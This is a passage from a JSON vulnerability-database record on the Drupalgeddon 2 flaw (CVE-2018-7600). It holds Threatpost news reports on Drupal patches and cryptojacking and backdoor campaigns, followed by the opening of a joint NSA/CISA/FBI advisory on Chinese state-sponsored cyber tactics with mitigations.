aspects of the vulnerability other than the patch acts as an input filter on web page requests.\n\nMackey described the vulnerability as a flaw that allows unsanitized data to enter the Drupal data space. \u201cUnder such circumstances a malicious user could cause Drupal to return data which the page authors never intended to be presented on the given page. Since the vulnerability is present within the bootstrap process, the best mitigation model is to convert the Drupal site to a pure HTML site. Administrative and maintenance pages are similarly impacted due to the issue being present in the bootstrap process,\u201d he said.\n\nKnaddison said the vulnerability has to do with the way Drupal interprets a value that begins with a hash as having a special meaning. \u201cGenerally, input filtering like this a blunt solution to the problem and not fixing the specific vulnerable code. But it gets rid of all kinds of input that might be a problem for code later in the code base,\u201d he said.\n\nKnaddison said there are a number of strong indicators that Drupal users are getting a jump on patching. He estimates \u201chundreds of thousands\u201d of sites immediately patched within the first 12 hours the patches were released. \u201cI think that with this release, we will see a very fast update rate because it just seems like everybody was really prepared to update within hours of the release,\u201d he said. Last week, [Drupal forewarned](<https://threatpost.com/drupal-forewarns-highly-critical-bug-to-be-patched-next-week/130733/>) of Wednesday\u2019s release of a highly critical patch.\n\nAccording to an analysis of Drupal sites by the firm SiteLock, only 18 percent of Drupal websites were found to be running the latest core updates. \u201cThis means that the vast majority of websites running Drupal are likely vulnerable to compromise because they are not being updated with the latest security patches,\u201d according to the company.\n", "cvss3": {}, "published": "2018-03-29T15:58:28", "type": "threatpost", "title": "Drupal Issues Highly Critical Patch: Over 1M Sites Vulnerable", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T15:58:28", "id": "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "href": "https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-09-07T08:18:49", "description": "Drupal is urging users to upgrade to the latest release that fixes two critical remote code execution bugs impacting Drupal 7 and Drupal 8. Developers have also identified three additional \u201cmoderately critical\u201d vulnerabilities.\n\n\u201cA remote attacker could exploit some of these vulnerabilities to take control of an affected system,\u201d according to a security bulletin [posted](<https://www.us-cert.gov/ncas/current-activity/2018/10/18/Drupal-Releases-Security-Updates>) by the United States Computer Emergency Readiness Team (US CERT).\n\nThe critical bugs, disclosed this week, include an injection vulnerability in the default Drupal mail backend, which uses PHP\u2019s mail function [DefaultMailSystem::mail()] in Drupal 7 and 8.\n\nOne of the critical vulnerabilities is tied to the \u201cDefaultMailSystem::mail()\u201d component in Drupal 7 and 8. According to the advisory, when using this default mail system to send emails, some variables were not being sanitized for shell arguments, according to a separate [advisory](<https://www.drupal.org/sa-core-2018-006>) released by the Drupal developer community. When untrusted input is not sanitized correctly that could lead to remote code execution.\n\nThis glitch was reported by security researcher and senior web developer [Damien Tournoud](<https://www.drupal.org/user/788032>) with Princeton University.\n\nA second remote code execution bug, reported by Nick Booher, exists in Drupal 9\u2019s Contextual Links module. In Drupal, these modules supply contextual links that allow privileged users to quickly perform tasks related to regions of the page \u2013 without having to navigating to the Admin Dashboard.\n\nHowever, the Contextual Links module doesn\u2019t sufficiently validate the requested contextual links. That means that an attacker could launch a remote code execution attack in these links.\n\nOne upside is that an attacker would need certain existing permissions: \u201cthis vulnerability is mitigated by the fact that an attacker must have a role with the permission \u2018access contextual links,'\u201d Drupal said.\n\nDrupal also acknowledged three other \u201cmoderately critical\u201d bugs in its advisory.\n\nThe first is an access bypass bug in the content moderation tool in Drupal 8. Essentially, in some conditions, content moderation fails to check a users\u2019 access to use certain transitions \u2013 potentially allowing access bypass.\n\nAnother open redirect vulnerability in Drupal 7 and 8 allows and external URL injection through URL aliases.\n\nThe path module allows users with the \u2018administer paths\u2019 to create pretty URLs for content \u2013 and that means that \u201cIn certain circumstances the user can enter a particular path that triggers an open redirect to a malicious url,\u201d Drupal said.\n\nThe issue is mitigated by the fact that the user needs the administer paths permission to exploit, Drupal said.\n\nFinally, a \u201cmoderately critical\u201d bug in Drupal\u2019s redirect process allows bad actors to trick users to visiting third party websites.\n\nAccording to Drupal, Drupal core and contributed modules frequently use a \u201cdestination\u201d query string parameter in URLs to redirect users to a new destination after completing an action on the current page.\n\n\u201cUnder certain circumstances, malicious users can use this parameter to construct a URL that will trick users into being redirected to a 3rd party website, thereby exposing the users to potential social engineering attacks,\u201d said Drupal.\n\nAll bugs were fixed, and Drupal advised users to upgrade to the most recent version of Drupal 7 or 8 core.\n\n\u201cMinor versions of Drupal 8 prior to 8.5.x are not supported and do not receive security coverage, so sites running older versions should update to the above 8.5.x release immediately. 8.5.x will receive security coverage until May 2019,\u201d the company said.\n\nDrupal has had a run through the mill when it comes to vulnerabilities this year, in particular dealing with a flaw ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) in [March](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) impacting versions 6,7, and 8 of Drupal\u2019s CMS platform, which impacted over one million sites running Drupal.\n", "cvss3": {}, "published": "2018-10-20T17:09:46", "type": "threatpost", "title": "Critical RCE Bugs Patched in Drupal 7 and 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-20T17:09:46", "id": "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "href": "https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:00", "description": "**UPDATE** \u2013 Hundreds of websites running on the Drupal content management system \u2013 including those of the San Diego Zoo and the National Labor Relations Board \u2013 have been targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities.\n\nThe attacks, which have impacted over 400 government and university websites worldwide, leverage the critical remote-code execution vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) dubbed Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. The Drupal bug in questions has been patched for over a month now.\n\n\u201cAfter the scan completed, the full scope of this cryptojacking campaign was established,\u201d Mursch wrote in a [report posted Saturday](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>). \u201cUsing the bulk scan feature of urlscan.io, it became clear these were all sites were running outdated and vulnerable versions of Drupal content management system.\u201d\n\n> This [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) outbreak started at the zoo and quickly spread to 400+ other sites. <https://t.co/SNRtysBcsi>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 7, 2018](<https://twitter.com/bad_packets/status/993519523826290688?ref_src=twsrc%5Etfw>)\n\nAs of Tuesday evening, Mursch said he has found more websites that were targeted by the attack, including that of Lenovo, UCLA, and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (a US federal government agency).\n\n> Sheet has been updated with additional sites. It's not an exhaustive list and is subject to change as this [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign is still ongoing. <https://t.co/AwO2oe1znp>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 8, 2018](<https://twitter.com/bad_packets/status/993644561476894721?ref_src=twsrc%5Etfw>)\n\nThe cryptominer in question was made by Coinhive, a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who secretly embed the code into websites and then mine Monero currency by tapping the CPU processing power of site visitors\u2019 phones, tablets and computers.\n\n\u201cDigging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method,\u201d Mursch wrote. \u201cThe malicious code was contained in the \u2018/misc/jquery.once.js?v=1.2\u2019 JavaScript library.\u201d\n\nMursch said he was notified by one of his Twitter followers soon after of additional compromised sites using a different payload \u2013 however, all the infected sites pointed to the same domain using the same Coinhive site key. Coinhive\u2019s site key is code linked to a unique cryptographic key that delegates who keeps the cryptocurrency that is being mined.\n\nThat domain used to inject the malware was vuuwd[.]com, according to Mursch. \u201cOnce the code was deobfuscated, the reference to \u2018http://vuuwd[.]com/t.js\u2019 was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.\u201d\n\nThe site key used, meanwhile, was \u201cKNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.\u201d Mursch said he confirmed the key was still active by checking in Fiddler.\n\nMursch said that the miner was only slightly throttled so that it had a reduced impact on visitors\u2019 CPUs and would be harder to detect.\n\nTypically, cryptojacking attacks are not throttled and use 100 percent of the target\u2019s CPU. As a result victims can sometimes experience overheating of their phone or computer as their device gets bogged down by an over-taxed processor.\n\nWhen trying to nail down the owner of vuuwd[.]com, Mursch came across fake data from WHOIS indicating that \u201cit belongs to \u2018X XYZ\u2019 who lives on \u2018joker joker\u2019 street in China,\u201d he explained in a Tweet. However, the email address that was used (goodluck610@foxmail.com) provided a small hint as it was associated with other registered domains.\n\n> While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information. [pic.twitter.com/IEeqXrAKTT](<https://t.co/IEeqXrAKTT>)\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 4, 2018](<https://twitter.com/bad_packets/status/992539059485528065?ref_src=twsrc%5Etfw>)\n\nThe domain name vuuwd[.]com was also used previously in Monero mining operations through mineXMR[.]com, said Mursch: \u201cWhile it\u2019s somewhat unusual they\u2019d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made,\u201d he said.\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6,7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits, botnets and cryptomining malware have cropped up \u2013 including a recent attack, leveraging the \u201cKitty\u201d [cryptomining](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>) malware, which cashed in on the vulnerable Drupal websites.\n\nBeyond the Kitty malware, researchers have found a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cWe\u2019ve seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks,\u201d said Mursch in the report. \u201cThis is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-05-07T16:16:20", "type": "threatpost", "title": "Cryptojacking Campaign Exploits Drupal Bug, Over 400 Websites Attacked", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-07T16:16:20", "id": "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "href": "https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-11-03T07:11:44", "description": "Hackers have been stealing CPU-cycles from visitors to the Make-A-Wish Foundation\u2019s international website in order to mine for Monero cryptocurrency. Researchers said they found the CoinIMP mining script embedded in the non-profit\u2019s website, and that it was taking advantage of the Drupalgeddon 2 vulnerability.\n\nTrustwave researchers discovered the cryptominer on the Make-A-Wish International\u2019s [website](<https://worldwish.org/en>) and said it had been active since May. Make-A-Wish International is the global arm of the US-based Make-A-Wish Foundation.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/11/19094554/make-a-wish-.png>)\n\n\u201cEmbedded in the site was a script using the computing power of visitors to the site to mine cryptocurrency into the cybercriminals\u2019 pockets, making their \u2018wish\u2019 to be rich, come \u2018true,'\u201d said Simon Kenin, security researcher with Trustwave in a Monday [post](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Hacker-s-Wish-Come-True-After-Infecting-Visitors-of-Make-A-Wish-Website-With-Cryptojacking/?page=1&year=0&month=0&LangType=1033>) outlining the discovery. \u201cIt\u2019s a shame when criminals target anyone but targeting a charity just before the holiday season? That\u2019s low.\u201d\n\nThe CoinIMP miner is JavaScript based and is often used by unsavory individuals who secretly embed the code into websites and use it to mine Monero currency on a site visitor\u2019s phone, tablet or computer.\n\nAccording to Kenin, the attack leveraged an unpatched instance of the Drupal online publishing platform and the [Drupalgeddon 2 vulnerability,](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>) patched in March.\n\n\u201cA quick investigation showed that the domain \u2018drupalupdates.tk\u2019 that was used to host the mining script is part of a known campaign which has been exploiting Drupalgeddon 2 in the wild since May 2018,\u201d said Kenin.\n\nWhile a patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available for months, many sites have not updated and remain vulnerable. As of June, in fact, more than More than 115,000 sites were still [vulnerable](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>).\n\nThis cryptojacking campaign was particularly difficult to find because it used different techniques to avoid static detections. For instance, it starts with changing the domain name that hosts the JavaScript miner (which is itself obfuscated). Then, the WebSocket proxy also used different domains and IPs to avoid blacklist solutions, according to Trustwave.\n\nKenin said he reached out to the Make-A-Wish organization, but didn\u2019t hear back \u2013 however, the injected script has since been removed from the site.\n\n\u201cWe are aware that the Make-A-Wish International Worldwish.org website was impacted by a vulnerability, which has been removed and remedied,\u201d A Make-A-Wish spokesperson told Threatpost. \u201cNo Make-A-Wish International donor or constituent data was compromised by this incident. Make-A-Wish International is redoubling its efforts to maintain website security against third-party threats.\u201d\n\nIn the meantime, Kenin warned that Drupal-based websites need to be updated or risk malicious exploits such as Drupalgeddon 2.\n\n\u201cDrupalgeddon 2 is not the only attack vector that cyber criminals use to infect sites with cryptojacking malware,\u201d he said. \u201cThe cryptojacking phenomenon is so widely spread that it is sometimes hard to tell whether a website is infected with malware or the mining code was genuinely added by the site owner. This is especially true of smaller sites, who might use cryptomining in a legitimate source of income but whose ability to secure their website might also be limited putting them at risk of cryptojacking compromise.\u201d\n", "cvss3": {}, "published": "2018-11-19T16:20:59", "type": "threatpost", "title": "Cryptojacking Attack Targets Make-A-Wish Foundation Website", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-11-19T16:20:59", "id": "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "href": "https://threatpost.com/cryptojacking-attack-targets-make-a-wish-foundation-website/139194/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T05:50:45", "description": "Researchers are warning of a new wave of cyberattacks targeting unpatched Drupal websites that are vulnerable to Drupalgeddon 2.0. What\u2019s unique about this latest series of attacks is that adversaries are using PowerBot malware, an IRC-controlled bot also called PerlBot or Shellbot.\n\nResearchers at IBM Security\u2019s Managed Security Services reported the [activity on Wednesday](<https://securityintelligence.com/threat-actors-prey-on-drupalgeddon-vulnerability-to-mass-compromise-websites-and-underlying-servers/>) and said a successful attack can open a backdoor to a vulnerable Drupal websites, giving adversaries complete control over the site. Under the [NIST Common Misuse Scoring System](<https://groups.drupal.org/security/faq-2018-002>), the Drupalgeddon 2.0 vulnerability has been given a score of 24/25, or highly critical.\n\nThe Drupal security team has known about the vulnerability[ since at least March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), reporting under [CVE-2018-7600](<https://www.drupal.org/SA-CORE-2018-002>). Upgrading older versions of Drupal 7 to 7.58 and older versions of Drupal 8 to 8.5.1 will patch the Drupalgeddon bug. Drupal is estimated to be used on 2.3 percent of all websites and web apps worldwide.\n\n\u201cThose found unpatched or vulnerable for some other reason might fall under the attacker\u2019s control, which could mean a complete compromise of that site,\u201d wrote co-authors Noah Adjonyo and Limor Kessem in a blog post. \u201cWith this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.\u201d\n\nAccording to researchers, the attackers scan websites looking specifically for the Drupalgeddon 2.0 vulnerability. If the target has the bug, attackers then scan the /user/register and /user/password pages in the installation phase while brute force attacking for a user password. Once the attacker has cracked the authentication vector, they install the Shellbot backdoor. The Shellbot instance that IBM\u2019s researchers have seen connected to an IRC channel, using the channel as a hub for command and control server instructions.\n\nShellbot is a malicious backdoor script which has been around since 2005. It\u2019s designed to exploit MySQL database driven websites, including those with a content management system (CMS) such as Drupal. Shellbot is constantly being re-configured to target different remote code execution vulnerabilities. As time goes on, it\u2019s conceivable a version of Shellbot could be exploiting web vulnerabilities that have yet to exist or be discovered.\n\nOnce the attacker\u2019s command-and-control server has shell access to a target Drupal webiste they can look for SQL injection vulnerabilities, executing DDoS attacks, distributing phishing email spam, and terminating any existing cryptominers in order to [install their own cryptomining malware](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>).\n\nOver the past year, since [Drupalgeddon was publicly disclosed and patched](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), there have been a number of cyber gangs that have exploited the vulnerability in sites as notable as [San Diego Zoo, Lenovo and the National Labor Relations Board](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>). In many of those incidences adversaries have targeted systems ideal to plant [cryptocurrency miners](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>).\n\n\u201cInjection is still the number one item in the Open Web Application Security Project top ten,\u201d said Sean Wright, a lead application security engineer. \u201cIt continues to be an issue which presents itself and results in things such as remote code execution, such as in this case. Development teams need to ensure that they sanitize any data which they do not control to prevent issues such as this.\u201d\n\nAnother issue that constantly presents itself is the lack of patching. Organization are putting themselves at significant risk by not applying appropriate patches. After the Equifax breach last year, one would have thought that this would have provided a good example of why patching is so important. Unfortunately this appears to not have been the case.\n", "cvss3": {}, "published": "2018-10-11T20:24:54", "type": "threatpost", "title": "New Drupalgeddon Attacks Enlist Shellbot to Open Backdoors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-11T20:24:54", "id": "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "href": "https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-03-14T18:31:25", "description": "### Summary\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework, Version 9, and MITRE D3FEND\u2122 framework, version 0.9.2-BETA-3. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._\n\nThe National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People\u2019s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China\u2019s long-term economic and military development objectives.\n\nThis Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.\n\nTo increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.\n\n[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.\n\n### Technical Details\n\n#### **Trends in Chinese State-Sponsored Cyber Operations**\n\nNSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:\n\n * **Acquisition of Infrastructure and Capabilities**. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community\u2019s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.\n\n * **Exploitation of Public Vulnerabilities. **Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability\u2019s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:\n\n * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),\n\n * CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and\n\n * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).\n\n * **Encrypted Multi-Hop Proxies. **Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.\n\n#### **Observed Tactics and Techniques**\n\nChinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&amp;CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).\n\nRefer to Appendix A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.\n\n\n\n_Figure 1: Example of tactics and techniques used in various cyber operations._\n\n### Mitigations\n\nNSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:\n\n * **Patch systems and equipment promptly and diligently. **Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. \n**Note: **for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.\n\n * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.\n * **Use protection capabilities to stop malicious activity. **Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.\u25aa\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ ](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>)for previous reporting on Chinese state-sponsored malicious cyber activity.\n\n### Disclaimer of Endorsement\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### Purpose\n\nThis document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/.](<http://www.us-cert.gov/tlp/>)\n\n### Trademark Recognition\n\nMITRE and ATT&amp;CK are registered trademarks of The MITRE Corporation. \u2022 D3FEND is a trademark of The MITRE Corporation. \u2022 Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. \u2022 Pulse Secure is a registered trademark of Pulse Secure, LLC. \u2022 Apache is a registered trademark of Apache Software Foundation. \u2022 F5 and BIG-IP are registered trademarks of F5 Networks. \u2022 Cobalt Strike is a registered trademark of Strategic Cyber LLC. \u2022 GitHub is a registered trademark of GitHub, Inc. \u2022 JavaScript is a registered trademark of Oracle Corporation. \u2022 Python is a registered trademark of Python Software Foundation. \u2022 Unix is a registered trademark of The Open Group. \u2022 Linux is a registered trademark of Linus Torvalds. \u2022 Dropbox is a registered trademark of Dropbox, Inc.\n\n### APPENDIX A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures\n\n**Note: **D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&amp;CK techniques and sub-techniques.\n\n### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)] \n\n_Table 1: Chinese state-sponsored cyber actors\u2019 Reconnaissance TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nActive Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)] \n\n| \n\nChinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\n| \n\nMinimize the amount and sensitivity of data available to external parties, for example: \n\n * Scrub user email addresses and contact lists from public websites, which can be used for social engineering, \n\n * Share only necessary data and information with third parties, and \n\n * Monitor and limit third-party access to the network. \n\nActive scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nGather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)] \n \n### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]\n\n_Table II: Chinese state-sponsored cyber actors\u2019 Resource Development TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| Defensive Tactics and Techniques \n---|---|---|--- \n \nAcquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.\n\n| \n\nAdversary activities occurring outside the organization\u2019s boundary of control and view makes mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.\n\n| \n\nN/A \n \nStage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)] \n \nObtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]: \n\n * Tools 